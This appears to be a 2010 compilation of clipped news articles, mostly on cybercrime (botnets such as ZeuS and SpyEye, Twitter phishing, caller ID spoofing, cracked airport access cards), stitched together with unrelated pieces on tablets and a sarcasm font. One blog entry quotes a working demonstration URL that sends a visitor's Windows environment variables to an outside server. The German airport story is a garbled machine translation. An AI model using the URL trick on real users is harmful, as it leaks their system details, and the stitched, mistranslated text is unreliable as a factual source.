Better still, from a hacker’s perspective, such a goal is not a top priority for the international community, despite an outcry over hacking and censorship and disputes over cyberspace pitting China and Iran against U.S. firm Google.

Nations are thinking too parochially about their online security to collaborate on crafting global cyber regulation, an EastWest Institute security conference heard last week.

Policy statements from governments around the world are dominated by the need to heighten national cyber defenses. As a result, too many cyber criminals are getting a free ride.

“Nations are in denial,” a cyber law expert told Reuters, saying national legislation was of limited use in protecting users of a borderless communications tool.

“It may take a big shock of an event to wake people out of their complacency, something equal to a 9/11 in cyberspace,” he said referring to the 2001 coordinated attacks on U.S. cities.

With a quarter of humanity connected to the Internet, cyber crime poses a growing danger to the global economy.

TARGET THE PERPETRATOR

The FBI tallied $264 million in losses from Internet crime reported by individuals in the United States in 2008 compared to $18 million of losses from 2001: These were probably a fraction of the losses caused to companies and government departments.

The menace extends to many sectors including control systems for manufacturing, utilities and oil refining, since many are now tied to the Internet for convenience and productivity.

A priority for regulators is to find ways of tracking down criminals across borders and ensuring they are punished, a tough task when criminals can use proxy servers to remain anonymous.

“We cannot postpone the debate until we are in the midst of a catastrophic cyber attack,” former U.S. Homeland Security Secretary Michael Chertoff told the conference.

“We must formulate an international strategy and response to cyber attacks that parallels the traditional laws governing the land, sea, and air.”

Security experts say the ability to conduct disastrous mass cyber attacks is the preserve of some governments, well beyond the capacity of militant guerrilla groups like al Qaeda.

But it cannot be assumed that international organized criminal networks, long practiced at mass online fraud and theft, are not developing an interest in gaining this ability.

“Cyber crime is a very sophisticated crime with very sophisticated players and it takes a multinational effort to make sure we can enforce the law,” Dell Services President Peter Altabef told Reuters.

“Once you have identified who is at fault you really want to make sure, as a deterrent, that you can go to those jurisdictions and enforce the laws on the books.”

James Stikeleather, Dell Services Chief Technology Officer, told Reuters that tracking own criminals across borders could pose legal issues for drafters of multilateral regulation.

Giving an example, he said the more companies added the technology needed to give investigators the ability to attribute a crime, the more users’ privacy and anonymity would be reduced.

“PLAYING WITH FIRE”

“Probably the sticking point among the governments will be ‘where is the appropriate level of attribution versus anonymity or privacy for what people are doing (online)’.”

Datuk Mohammed Noor Amin, chairman of the U.N.-affiliated International Multilateral Partnership Against Cyber Threats, said failure to regulate could perpetuate cyber “failed states.”

He cited impoverished countries where customers can purchase unregistered SIM cards with mobile Internet capability, giving them the ability to commit online crime such as identify theft against people in rich nations without fear of being traced.

He said it was in the interest of rich nations to help poorer countries develop the capacity to crack down on this kind of abuse, because their own citizens were being targeted.

“Governments tend to look at their self-interest. But it’s actually in their own interest to collaborate,” he said.

Altabef said the growing rate and scale of international cyber attacks threatened to undermine the trust between nations, businesses and individuals that was necessary for economies and societies to act on the basis of the common good.

Complacency was also a problem, delegates said. “Nations take for granted the Internet is going to be ‘on’ for the rest of our lives. It may not necessarily be so,”.

“Imagine the Internet being down for two to four weeks,” he said. This would “rain disaster” on online businesses as well as transport, industry and governmental surveillance systems.

“People have realize the Internet is an integral part of every country, politically, socially and business-wise.”

“Not to focus on cybersecurity is playing with fire.”

Are Tablets really the next big thing in computing? May be, may be not (need to wait for sales figures to answer this)! However, Apple’s iPad has surely created a buzz around Tablets. You have HP, Dell and all other PC vendors of every size and shape readying a Tablet PC.

In the content is a Desi Tablet too, Adam. Designed by an alumunus of National Institute of Design, Makarand Kulkarni, Nokion Ink’s Adam is being billed as an iPad killer. Here’s looking into what Apple’s iPad has that our Adam lacks and vice versa. And how the two compare on various specs like memory, display, connectivity, pricing and more.

Dimensions

Measuring 6.3 x 9.8 x 0.6 inches, Adam weighs around 770 gms. Adam has two versions, one is 12.9mm and the other is 11.4mm in thickness. Both versions are slimmer than iPad which is 13.4mm in thickness.

While Apple’s iPad measures 9.56 inches in height, 7.47 in width and 0.5 inch in depth. iPad weighs 1.5 lbs (0.68 kg), the 3G version is 0.1 pounds heavier.

Display

Adam boasts of a 10-inch Pixel Qi transflective display, a capacitive touchscreen capable of recognizing six simultaneous points of contact. Pixel Qi’s technology offers two different modes: full colour LCD for indoor use or in a low-power reflective mode that actually gets brighter when more direct sunlight falls upon it.

iPad has a 9.7-inch LCD colour screen. The device uses iPhone’s multi-touch technology, Apple’s Magic Mouse, and the company’s trackpad technology found in some of the company’s laptops.

Camera

Adam supports a 3 megapixel swivel auto focus camera. This implies that the device will support video calling.

However, Apple’s iPad lacks camera. Lack of camera being widely seen as a negative in iPad as the device is said to be placed somewhere between a smartphone and laptop.

Output

Adam has HDMI-out and 3 USB ports, and can output video at 1080p resolution.

However, there is no facility for HDMI output in iPad. This means users will not be able to view HD videos on a large TV screen even if they have downloaded the same from iTunes. The Apple device can playback at 720p HD video.

Processor

Adam is powered by Nvidia Tegra 2 chip which runs at 1GHz and acts as both a CPU and graphics card in one. It will run on Google’s Android OS.

iPad runs a version of the iPhone’s operating system. The iPad has a 1GHz chip that is custom designed by Apple.

Memory

Adam will come in 16GB or 32GB versions. Apple iPad will come in 16, 32 and 64GB versions.

Multitasking

According to Adam creator Notion Ink, the Tablet will support multitasking. This means the device will be able to run several applications in parallel.

However, there is no multitasking option in iPad’s OS. This means for example users can’t listen to FM while they surfing the Web, or switch back and forth between Facebook or Twitter, or write an email while talking on a VOIP call.

Flash

Adam offers support for Flash, video standard used for viewing websites. However, iPad doesn’t offer support for Flash.

This means users will encounter those `big, empty video boxes in the middle of a page’ while surfing on the pages which require Adobe Flash. Youtube will be supported just like in iPhone but no Flash games. In iPhone 3GS too when users browse through Web pages with Adobe Flash, it displays empty spaces with missing icons.

Connectivity

Adam packs WiFi, 3G, Bluetooth, a pile of sensors and accelerometers and GPS.

Apple iPad supports both WiFi and Bluetooth connectivity. The WiFi antenna supports 802.11 a/b/g/n. The device also packs GPS.

S D Card

Apple’s iPad doesn’t offer SD card slot which means users cannot expand their memory. However, Adam which comes in 16 and 32GB storage options offers SD card slot.

Battery

According to Notion Ink, Adam will be able to play music for up to 25 days, 16 hours of internet browsing and play high definition video for 8 hours. According to reports, Adam integrates two breakthrough power saving components that promises twice the battery life of Apple iPad.

iPad offers battery life of up to 10 hours. The standby time is approximately a month.

Apps

Notion Ink has planned an App competition offering $1,000,000 prize money for the best Adam-compatible app.

Apple’s iPad can use virtually all the over 140,000 apps currently available for the iPhone. However, iPad will let you download applications only from Apple’s AppStore. iPad doesn’t allow users to download any apps other than from the App Store.

PRICE

The Adam is expected to cost about $325.

iPad’s 16GB version of the basic Wi-Fi model will sell for $499. A 32GB version will cost $599, and a 64GB device will be $699. The 3G models won’t be available until April. Those will range in price from $629 to $829.

The attack, which is ongoing, began on Saturday, as Twitter users found members of the micro-blogging network had posted messages disguised as humorous inks, but actually aimed to phish passwords credentials from unsuspecting users.

Messages, which began with phrases such as “Lol. this is me??”, “lol, this is funny.”, “Lol. this you?? ” and “ha ha, u look funny on here”, were accompanied with clickable links which redirected users to a fake Twitter login page hosted on a Web site based in China.

Researchers discovered that although the main wave of poisoned messages has been via private direct messages between individual users on Twitter, dangerous links are also being posted in public feeds. This means that innocent users can stumble across the links even if they are not sent it directly, or even if they are not a signed-up user of Twitter.

“Thousands of users being put at risk of having their account broken into,” said Graham Cluley, senior technology consultant at Sophos.

“The cybercriminals behind the attack are creating a zombie network, or botnet, of hacked accounts that they can then abuse to spread spam, distribute malware and steal identities. There’s nothing funny about the LOL attack — you have to be on your guard against clicking on the dangerous messages. If you’ve fallen for it you must change your Twitter password immediately.”

The phishing campaign appears to be already bearing fruit for the hackers as they are now distributing spam selling herbal Viagra from the compromised accounts.

February 18th 2010

http://www.nydailynews.com/news/2010/02/18/2010-02-18_kneber_botnet_virus_attacks_75000_computers_worldwide_including_us_government_sy.html

A new computer virus has infected almost 75,000 computers worldwide – including 10 U.S. government agencies – collecting login credentials from online financial, social networking sites and email systems and reporting back to hackers.

The virus, dubbed the Kneber botnet, is thought to be the brainchild of an Eastern European criminal group that is likely selling the information on the black market, according to the Internet security firm NetWitness, which uncovered the attacks in January.

The attacks are continuing and corporate losses are still being compiled, said NetWitness chief technology officer Tim Belcher.

The FBI, Department of State and Department of Homeland Security have been notified, Belcher said.

The crime groups “running this activity are every bit as expert at compromising systems and siphoning off information as nation states,” according to Belcher.

“They’re well funded, motivated and successful.” Hackers using the new virus have infiltrated the computer networks of more than 2,400 companies in almost 200 countries over an 18-month period, the Herndon, Va.-based computer security firm reported.

Further investigation revealed that many commercial and government systems were compromised, including 68,000 corporate login credentials and access to email systems, online banking sites, Yahoo, Hotmail and social networks such as Facebook.

Infiltrated companies include pharmaceutical giant Merck & Co., Cardinal Health Inc., software firm Juniper Networks and Paramount Pictures, the Wall Street Journal reported Thursday.

Hackers reportedly used the virus to break into computers at 10 U.S. government agencies and in one case obtained the user name and password for a soldier’s military e-mail account.

Companies in Egypt, Mexico, Saudi Arabia, Turkey and the U.S. are the most frequently targeted in the attack, according to a research paper released by NetWitness.

The attack uses a piece of software called ZeuS, designed in Eastern Europe, that takes control of large numbers of computers.

ZeuS is among the top five most reported computer infections, according to the Department of Homeland Security.

“These large-scale compromises of enterprise networks have reached epidemic levels,” said Amit Yoran, CEO of NetWitness and former Director of the National Cyber Security Division.

“Cyber criminal elements like the Kneber crew quietly and diligently target and compromise thousands of government and commercial organizations across the globe.”

Yoran said that conventional intrusion detection systems are “inadequate for addressing Kneber or most other advanced threats.”

http://www.h-online.com/security/news/item/Top-25-Programming-Errors-list-updated-933535.html

Just as they did last year, over thirty international security organisations have come together, to publish a list of the 25 most dangerous programming errors leading to vulnerabilities that can be exploited for cybercrime and espionage. The 2010 CWE/SANS Top 25 MDPE (Most Dangerous Programming Errors) has been updated with a number of improvements to how the errors are graded, prioritised and categorised. For example, new “Focus Profiles” allow readers to quickly see the listed errors sorted for particular professionals’ interests.

A Category based view of the list sorts the errors into “Insecure Interaction”, covering various injection techniques, “Risky Resource Management”, covering buffer overflows or invalid calculations and “Porous Defenses”, which encompasses weaknesses in encryption or authentication. In the overall short list, the top problems were cross site scripting, SQL injection, classic buffer overflows, cross site request forgery and improper access control.

The idea behind the publication of the list is to make developers aware of the causes of many weaknesses and their ramifications in terms of overall security. The list also includes a section on “Monster Mitigations”, a set of practices which, if followed, can help address many of the Top 25 errors or reduce their severity.

Red Hat’s Mark Cox also published an analysis of programming errors Red Hat experienced in 2009. He noted that of the eleven flaws that have affected Red Hat Linux development, 5 were not in the top 25 but four of them were “on the cusp” having just missed inclusion in the CWE/SANS list. Cox says that “2009 was the year of the kernel NULL pointer dereference flaw” but that this flaw didn’t make it to the top 25 as, in 2010, the “Linux kernel and many vendors ship with protections to prevent kernel NULL pointers leading to privilege escalation”.

Organisations that contributed to the compilation of the list include, McAfee, Microsoft, Oracle and Symantec as well as organisations such as the Open Web Application Security Project (OWASP) and the Web Application Security Consortium (WASC).

The initiative is managed by Mitre and the SANS Institute . It receives funding from the US Homeland Security’s National Cyber Security Division and the NSA, who also contributed to compiling the list.

The List –

http://cwe.mitre.org/top25/#Listing

By Robert McMillan

IDG News Service

February 9, 2010

http://www.computerworld.com/s/article/9154618/New_Russian_botnet_tries_to_kill_rival

IDG News Service – An upstart Trojan horse program has decided to take on its much-larger rival by stealing data and then removing the malicious program from infected computers.

Security researchers say that the relatively unknown [Spy Eye toolkit] added this functionality just a few days ago in a bid to displace its larger rival, known as Zeus.

The feature, called “Kill Zeus,” apparently removes the Zeus software from the victim’s PC, giving Spy Eye exclusive access to usernames and passwords.

Zeus and Spy Eye are both Trojan-making toolkits, designed to give criminals an easy way to set up their own “botnet” networks of password-stealing programs. These programs emerged as a major problem in 2009, with the U.S. Federal Bureau of Investigation estimating last October that they have caused $100 million in losses.

Trojans such as Zeus and Spy Eye steal online banking credentials. This information is then used to empty bank accounts by transferring funds to so-called money mules — U.S. residents with bank accounts — who then move the cash out of the country.

Sensing an opportunity, a number of similar Trojans have emerged recently, including Filon, Clod and [Bugat], which was discovered just last month.

Spy Eye popped up in Russian cybercrime forums in December, according to Symantec Senior Research Manager Ben Greenbaum.

With its “Kill Zeus” option, Spy Eye is the most aggressive crimeware, however. The software can also steal data as it is transferred back to a Zeus command-and-control server, said Kevin Stevens, a researcher with SecureWorks. “This author knows that Zeus has a pretty good market, and he’s looking to cut in,” he said.

Turf wars are nothing new to cybercriminals. Two years ago a malicious program called Storm Worm began attacking servers controlled by a rival known as Srizbi. And a few years before that, the authors of the Netsky worm programmed their software to remove rival programs Bagle and MyDoom.

Spy Eye sells for about $500 on the black market, about one-fifth the price of premium versions of Zeus. To date, it has not been spotted on many PCs, however.

Still, the Trojan is being developed quickly and has a growing list of features, Greenbaum said. It can, for example, steal cached password information that is automatically filled in by the browser, and back itself up via e-mail. “This is interesting in its potential, but it’s not currently a widespread threat at all,” he said.

I ran across a pretty interesting article on RSnake’s blog about using a URL to get users to disclose personal information. Here is the original article:

http://ha.ckers.org/blog/20090810/de-cloaking-in-ie70-via-windows-variables/

I tested this in IE8 and the posting claims it works in IE6 and IE7 as well.  I tested in Firefox with and without NoScripts enabled and it doesn’t work.  Yay Firefox!

What you can do is to embed text in a URL surrounded by the normal % % that will grab the actual value out of the system value and post it to the webserver.  Since the values post to the webserver, the people behind the webserver have the ability to view the values.  So, what types of information can be disclosed?  Anything that is contained within your Enviromental variables, for example.

RSnake put up a page that will allow you to try this out:  You will see that the appdata and Computer name should display in the resulting page.

http://ha.ckers.org/log.cgi/rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz

RSnake has asked that if anyone could get this URL to work without requiring a user to type it in their address bar.  Several posters commented that they tried embedding the URL in images, IFrames, etc and couldn’t do it.

Pretty interesting stuff.

The attacks come in many forms: spreading Trojan viruses including key loggers, phishing for passwords and sniffing out packets of sensitive information.

In fact, according to recent research from Breach Security Labs, social networks were the most targeted category in 2009, accounting for 19% of all malicious attacks last year.

The media reports evidence of these attacks seemingly every day.

For instance, in late January Twitter announced that they had once again fallen victim to hackers who were using torrent-based phishing attacks to steal usernames and passwords and hack into user accounts.

This is not the first time the popular social network has been hacked.

In late 2009, some Twitter users fell victim to a phishing attack when they received email notifications from their “new followers,” with a link that lead them to a fake Twitter site where they were prompted to enter their usernames and passwords.

Facebook has had its share of malicious attacks as well.

Most recently, in January there were widespread reports of users receiving direct messages from their “friends” within the network that included a link to a website that was suspected to infect the user’s computer with spyware.

Other widely reported incidents involve offers for a free iPod touch or gift cards, when in fact the only gift these unsuspecting users received was to have their usernames and passwords sold as part of a phishing list readily available for would-be cyber criminals to purchase online.

It’s no shock that these sites are being targeted considering that the time American’s spent on social networks increased 82% in 2009 from the previous year, accounting for over 17% of the total time spent online. *

Many of the more prominent networks have taken measures to increase security and privacy settings.

For example, Facebook has begun to closely monitor the number of postings from each account to detect abnormal behavior that can indicate an account has been compromised.

If a user who normally posts once or twice a day begins to send out hundreds of messages, the account is flagged within the system and attempts are made to contact the user and alert them to change their password and advise friends not click though on links from their recent postings.

In addition to setting robust social network passwords, setting personal reminders to change your passwords monthly and taking advantage of the privacy settings afforded by each individual network, consumers can also take advantage of simple and cost effective data encryption solutions designed to lock down your personal info and passwords.

The more advanced encryption software solutions available today enable the user to securely log into websites by using specialized tools like password managers that retain all of the data regarding each account in an encrypted vault or folder.

The data entered into password managers is encrypted in case of theft or loss of the computer or USB flash drive it is stored on.

These types of password protection features are also capable of creating, storing and managing strong secure passwords so you can maintain unique IDs for each website, without having to remember them each time you log on to do online banking, surf social networks or check your email.

By utilizing tools like password managers, users eliminate the risk of exposing themselves when using computers that they do not own.

Finally, there is another very simple tool that needs to be used when on any type of social networking site: common sense.

Only put info on your walls, blogs, tweets or posts that you would feel comfortable with strangers knowing. For example, you may not want everyone to know when you will be out for the night.

This opens a door for someone to be watching and break into your home knowing you are not around.

Exercising some simple common sense in terms of what information is made public could have prevented many of the social network related horror stories we hear about every week.

With the rapid growth in social networking and the increasing instances cyber criminals targeting these online destinations, it’s imperative that we all understand the potential threats of identity theft and harm to our personal reputations.

By using simple data encryption and password protection tools, you can ensure that your personal information and online identities remain secure and private.

Nielson Research Study

February 5, 2010

http://blogs.wsj.com/digits/2010/02/05/the-rise-of-caller-id-spoofing/

Applications that let users change or “spoof” their Caller ID are gaining in popularity in mobile phone app stores, even as Congress considers stalled legislation to outlaw particular uses of the technology, and criminals use it to engage in nefarious activity.

Caller ID spoofing technology allows a user to change the caller ID to show any desired number on a recipients caller ID display. There are currently a handful of companies that offer this service including SpoofCard (and it’s mobile application called Spoof App) and Spoofem, among others.

Most spoofing apps allow pranksters to mask or change their voice as well, and Spoofem actually allows users to fake texts and email. Popular desktop versions are now becoming available online in Blackberry and Droid app stores.

Spoofem and Spoofcard both claim over a million customers. “People use it as a lifestyle,” says Meir Cohen, President of TelTech Systems, SpoofCard’s parent company. Most services tend to charge $10 an hour. Spoofem’s President Gregory Evans claims more than a million dollars a year in profit.

There are useful and legitimate applications of the software: A doctor who has to call back a patient late at night and doesn’t want them to have his home or cell phone number, for instance; A public relations specialist calling on behalf a client, and wanting the client’s name to pop up on the Caller ID display.

And, of course, there is the cheating issue. Spoofem started marketing its product to women when it found, early on, that 80 percent of its users were women who were trying to catch their boyfriend or girlfriend cheating.

But the same spoofing software lets users hack into other people’s voicemail, by taking advantage of a feature in most mobile phone carriers that allows calls from a person’s own phone to default to voicemail without a password.

Spoofing companies blame the carriers for the security flaw. “It is not the service…. it’s the cell phone companies,” says Gregory Evans, President of Spoofem.com. “The cell phone companies have to take some type of responsibility.”

Some companies, such as T-Mobile have a default setting for voicemail that does not include a password.

“If the customer does not elect to turn the password on during setup, then the default setting is off,” says a spokesman for the company. “Individuals using these spoofing applications risk criminal as well as personal liability for their actions.”

AT&T also does not default its users to a passcode for voicemail. “Our customers strongly prefer to have one touch voicemail,” a spokeswoman says. “However, we make it simple to set your voicemail settings to require a password and encourage customers to do so.”

Amy Storey, A spokeswoman for CTIA, the International Association for Wireless Telecommunications, which represents wireless carriers, believes Caller ID spoofing should be illegal and supports proposed lesiglation that would make certain uses of spoofing software illegal.

Spoofing companies are confident they will survive, in the same way email technology survived spamming, or similar phishing scams. Washington, D.C.-area based Telecom Attorney Mark Del Bianco, who also represents Spoofcard, says Congress cannot legislate against a technology. “They can’t make telling lies illegal,” he says.

Del Bianco recommends setting up and keeping a password prompt on mobile voicemail. “In the end, it’s the responsibility of anyone who has a voicemail box to make sure it’s not easy to hack into that voicemail box,” he says.

And for those thinking of committing a crime with the Caller ID spoofing software, Del Bianco has words of caution. “There are an awful lot of people who believe that if they use Caller ID spoofing, somehow there is no call record, and it can’t be traced. That’s not the case.” He says Spoof Card gets regular subpoena requests from unhappy spouses and the NSA, among others.

Network World

February 3, 2010

http://www.computerworld.com/s/article/9151979/How_Wi_Fi_attackers_are_poisoning_Web_browsers?source=CTWNLE_nlt_security_2010-02-04

Public Wi-Fi networks such as those in coffee shops and airports present a bigger security threat than ever to computer users because attackers can intercede over wireless to “poison” users’ browser caches in order to present fake Web pages or even steal data at a later time.That’s  according to security researcher Mike Kershaw, developer of the Kismet wireless network detector and intrusion-detection system, who spoke at the Black Hat conference.

He said it’s simple for an attacker over an 802.11 wireless network to take control of a Web browser cache by hijacking a common JavaScript file, for example.

“Once you’ve left Starbucks, you’re owned. I own your cache-control header,” he said. “You’re still loading the cache JavaScript when you go back to work.

“Open networks have no client protection,” said Kershaw, who also uses the handle Dragorn. “Nothing stops us from spoofing the [wireless access point] and talking directly to the client,” the user’s Wi-Fi-enabled device.

Knowledge gained from researchers over the past year, he said, is showing that browser-cache poisoning over Wi-Fi can be kept in a persistent state unless the user knows how to effectively empty the cache.

“Once the cache is poisoned, it’s going to stay there,” Kershaw said. This means that an attacker can intercede to “poison the URL” of the victim so that he will see a fake Web page when they try to visit a specific Web site or try to insert a “shim” that could “ship your internal pages off to a remote server once you’re in a VPN.”

The few defenses Kershaw suggested were continuously manually clearing the cache, or using private-browser mode. “Who knows how to clear the browser cache in an iPhone?” he asked.

Kershaw acknowledged he doesn’t know how widely attacks based on poisoning the browser cache via 802.11 actually are. But the potential for trouble is so evident he said he’d advise corporate security professionals to try to “forbid users from taking laptops onto open networks,” though he admitted, “Your users may lynch you.” He said some vendors, including Verizon, are looking at solving this problem with a custom client that is tied to specific operating systems.

01 February 2010

http://timesofindia.indiatimes.com/india/India-needs-a-separate-cyber-police-force-Moily/articleshow/5521142.cms

NEW DELHI: India urgently needs a well-trained special police force to deal with cyber crimes and it must be equipped and trained to deal with all kinds of internet bugs, law minister Veerappa Moily said on Sunday.

“India does not have a specific police force to deal with cyber crimes and implementation of laws against crimes in the virtual world. India needs it urgently following the footsteps of US and South Korea,” Moily said at an interactive seminar for judges, heads of police forces and prosecution of states here.

He said there were many impediments that needed to be overcome soon. While a vast majority of the police force or prosecutors in the country had no experience of tackling cyber crime, judges too lacked experience in appreciating evidence in such cases. As cyber crime knows no geographical boundary, the absence of international cooperation between police forces adds to the woes of victims and lets the culprit go scot free, he said.

It was attorney general G E Vahanvati who pointed out the danger potential of cyber crime as was shown by `Trojan horse’ and `I love you’ bug and said cyber crime was not limited to the web world but had been extended to mobile phones, which could be used to bombard a victim with messages and send illicit MMSes.

Chief Justice of India K G Balakrishnan said cyber crimes caused irreparable damage to the victims though it may not involve inflicting of physical pain. “Someone’s bank account can be wiped off depriving him of life-long savings and others can face huge loss of reputation when his face is morphed and put in an obscene video on the net,” he said while emphasising on sensitisation of the police, prosecutors and judiciary about the consequences of the crime.

Supreme Court judge and Cyber Law Enforcement Committee chairman, Justice Altamas Kabir, said the attending DGPs and judges should make efforts to understand the nitty-gritty of the anti-cyber crime law enacted by the country in the shape of IT Act, 2000. However, he said going by the growing ingenuity of cyber criminals, there was a need for expanding the definitions of various crimes listed in the law.

Dictionary.com defines sarcasm as: “A form of wit that is marked by the use of sarcastic language and is intended to make its victim the butt of contempt or ridicule.” Sure, but sarcasm is often not aimed at a person so much as a situation or place, or nouns in general. Take, for example, the following statement: Meetings are a great way to make friends and are really fun. Do you think I’m serious, or am I being sarcastic?

Thanks to a company named Sarcasm, Inc., you don’t have to be confused about my intended meaning. For just $1.99 USD, you can download the SarcMark, a symbol that you insert into any text by typing this combination of keystrokes: Ctrl + >. You can use the SarcMark as a font when you know the receiver also has the SarcMark font installed, or as a graphic for when you don’t think the other person is cool enough to have the SarcMark yet. You can even put it on your mobile device by going to SarcMark.com from your mobile device and following the prompts.

But the question about the SarcMark isn’t so much can you use it– after all, if you are running a SarcMark compatible platform and are willing to pony up $1.99 USD, then you most certainly can — but rather, should you use it? I mean, if the guy on the other end of your message is too dense to get it, then doesn’t that become part of the joke? If you are concerned that your sarcasm might be misunderstood and that would create a problem, then maybe it just isn’t an appropriate time and place for sarcasm.

Don’t get me wrong — I love sarcasm; I spew sarcasm like a sailor spews foul language, and nothing gets me laughing like a well-placed, well-timed sarcastic comment. I just think that sarcasm ceases to be funny when you have to point it out, and quite frankly, I’m not excited to have to see some obnoxious symbol every time I get into a text conversation with my friends. I’m not saying it’s not worth $1.99 (I love fonts in general, and I might ask to be given the SarcMark for Valentine’s Day). I just think we should educate people on becoming more literate, rather than add symbols to our literature (even text-based conversations) to make it easier to read.

Would you use the SarcMark? Please share your thoughts about this new punctuation mark in the comments section.

Plus hundreds of others

By Dan Goodin in San Francisco

29 January 2010

http://www.theregister.co.uk/2010/01/29/strange_ssl_web_attack/

The Central Intelligence Agency, PayPal, and hundreds of other organizations are under an unexplained assault that’s bombarding their websites with millions of compute-intensive requests.

The “massive” flood of requests is made over the websites’ SSL, or secure-sockets layer, port, causing them to consume more resources than normal connections, according to researchers at Shadowserver Foundation, a volunteer security collective. The torrent started about a week ago and appears to be caused by recent changes made to a botnet known as Pushdo.

“What do I mean by massive? I mean you are likely seeing an unexpected increase in traffic by several million hits spread out across several hundred thousand IP addresses,” Shadowserver’ Steven Adair wrote. “This might be a big deal if you’re used to only getting a few hundred or thousands of hits a day or you don’t have unlimited bandwidth.”

Shadowserver has identified 315 websites that are the recipients of the SSL assault. In addition to cia.gov and paypal.com, other sites include yahoo.com, americanexpress.com, and sans.org.

It’s not clear why Pushdo has unleashed the torrent. Infected PCs appear to initiate the SSL connections, along with a bit of junk, disconnect and then repeat the cycle. They don’t request any resources from the website or do anything else.

“We find it hard to believe this much activity would be used to make the bots blend in with normal traffic, but at the same time it doesn’t quite look like a DDoS either,” Adair wrote.

Jaikumar Vijayan,

Computerworld

Jan 24, 2010

http://www.pcworld.com/article/187534/china_hacks_inspire_copycats.html?

Malicious hackers have begun using the recent cyberattacks against Google and more than 30 other companies as lures for launching even more targeted attacks, security firm F-Secure said in a blog post today.

The company reported spoofed e-mails purporting to contain details on the alleged Chinese attacks that contain a PDF attachment. When opened, it installs and runs the Acrobat.exe backdoor on the user’s machine.

A screen shot posted on F-Secure’s Web site showed an e-mail designed to look like it came from George Washington University. The e-mail, with the subject header ‘Chinese cyberattack,’ offered the target a review of an article on the recent attacks that the purported author had just written for the Far Eastern Economic Review.

When the attached PDF is opened in Acrobat Reader, it exploits a known vulnerability in the doc.media.newPlayer function of the reader to install a back door on the user’s system, F-Secure said. The flaw was patched by Adobe last week.

F-Secure reported seeing targeted attacks using similarly poisoned PDF files being directed at U.S. military contractors earlier this week. In that case, the e-mails were designed to appear as if they were from the U.S. Air Force and purported to contain information on an actual Department of Defense event scheduled for later this year.

F-Secure also said it has learned of a similar e-mail targeting the “intelligence sector,” but offered no further details.

Attacks that attempt to take advantage of popular news events or stories to fool users into clicking on malicious attachments or browsing to malicious sites have become common in recent years. What’s different now is that such attacks are being directed at specific individuals and are increasingly tailored to appear as if they are from a trusted source. Many of the so-called Advanced Persistent Threats (APT) faced by large companies such as Google rely heavily on social-engineering tricks to get targeted individuals to open infected e-mails or download malicious files.

In General, dont take everything for granted on sites like facebook etc, look before you add apps, u may never know what you might give away.

Forward this to your friends so that they also dont fall for this.

By Matthias Kremp

14/01/2010

http://www.spiegel.de/netzwelt/netzpolitik/0,1518,671980,00.html (Translated from German by Google)

http://translate.google.com/translate?u=http%3A%2F%2Fwww.spiegel.de%2Fnetzwelt%2Fnetzpolitik%2F0%2C1518%2C671980%2C00.html&sl=de&tl=en&hl=&ie=UTF-8

Alarming vulnerability to major German airports: With a simple 200-euro device can outsmart the security barriers. Hackers of the CCC led to ARD reporters can be scanned as easily access cards, and then electronically simulated – the police union is appalled.

After the foiled bomb attack in Detroit, the security agencies and airports have reacted quickly and sharply, before the inspection are always long queues, because the checks have been stepped up. Each piece of hand baggage is searched, each fluid control, many passengers two or three times chased through the metal detector.

It is an easy way to circumvent the controls – the ARD-Magazin “Contrasts” is now demonstrating that it appears in many German airports are a vulnerability that can be exploited by simple means.

The allegations are directed against several German airports used to access security system of the Swiss agent LEGIC It should be easy to crack – how easy to have hackers from the Chaos Computer Club (CCC reporters) presented.

The operating principle of the system is simple: Each employee receives an ID card with built-in microchip. To get into airport security areas, the card is tilted close to a reader. This takes over the air on contact with the chip that reads the data and opens the door, where the institution of the chip is identified as being authorized to access.

But with a relatively simple device can be cut short this seemingly secure protection mechanism. Namely, with a “programmable RFID reader, which can both pretend to be a reader – and can pretend to be a map,” said Karsten Nohl, CCC member of the “contrast” searchers. Assemble the apparatus, therefore, will cost less than $ 200.

With this device you can first read an access card – and then switch it so that it emulates the card, then electronically replicates. In the end, can be with the RFID reader to open those doors, which also include the original would have been granted access.

15 centimeters range approximation

In an interview with SPIEGEL ONLINE, the manufacturer Legic confirmed “that members of the Chaos Computer Club has been able to evaluate by reverse engineering the algorithm of Prime and disclose.

Nohl and other CCC members were “simply shocked to even find any hurdles that we would have to overcome.” Only the limited range of the used RFID reader and emulation device using brakes. With a suitably powerful power supply can be ideally bridging distances of about 70 centimeters. If one wishes to remain anonymous and do not bulky power apparatuses attention to themselves, reduces the distance to up to 15 centimeters. But it was no real obstacle, “said ARD editor Matthias Deiss

To read out a map of it ultimately matter if you stands on an escalator next to an airport employee. Because the ID cards bear the usually either on a long ribbon around the neck or with a short bunch of keys on his belt.

The Swiss compromised by the hackers access system is used in Germany at the airports of Hamburg, Berlin-Tegel, Stuttgart, Dresden and Hanover – and marketed internationally. How far with the stunt is in doubt, was an employee of the Hamburg airport the “contrasts” reporters clear. He had his access card entry to the security area and could thus “on access gates, roads, terminals and gates directly via the apron and of course get on an airplane.” With the RFID reader, the same should be possible.

The system is outdated

The Hamburg Airport recognizes the vulnerability. However, it is pointed out that the access is not the only security mechanism of the airport. With other systems would ensure that no unauthorized persons enter the premises. The nature of these systems has been, “contrasts” but not answered. An exchange of more than 15,000 access cards and readers can not get around 500 for cost reasons.

If you read the product description, the Legic published on his website, anyway, the question arises, why use airports specifically chosen this system to protect access. Accordingly, were key to the development of the system presented at the 1992 Cebit, the simplification and comfort in mind. It is also designed for controlling access to “large-scale projects in the leisure industry”, say for example in holiday resorts. According to the data sheet a “basic security with a focus on organization and convenience” is one of the main features of the system.

Legic told SPIEGEL ONLINE with the Prime System Chriffrierverfahren use a firm that meets the technical possibilities of 1992. The company has argued that such procedures are based essentially on the secrecy of the algorithms used. Compared with today’s methods “have these older methods, a lower safety level than modern systems”, which gives the manufacturer openly. He recommends that its customers, the technology “reassess and, where necessary, replace it with modern security systems.” However, even today is still guaranteed the security – if one Legic Prime with additional measures such as a pin number, a video surveillance or simply supplement an usher. But because it costs, just as a replacement of the entire system.

Interior Ministry and police union response

According to a spokesman for the Federal Interior Ministry is on the airport operators to review the security controls already been suggested. Rainer Wendt, chairman of the German police union, which is too little – he asks to replace the cracked security system immediately and put on the cutting edge of technology.

For the omissions of the operators, he shows no sympathy. He proposes to put the security operation now under the supervision of the federal police to: “so that the airport can be more sloppy as they want.”

By Cade Metz in San Francisco

Posted in Security, 27th January 2010 00:28 GMT

http://www.theregister.co.uk/2010/01/27/google_toolbar_caught_transmitting_data_when_disabled/

Google has updated its browser toolbar after the application was caught tracking urls even when specifically “disabled” by the user.
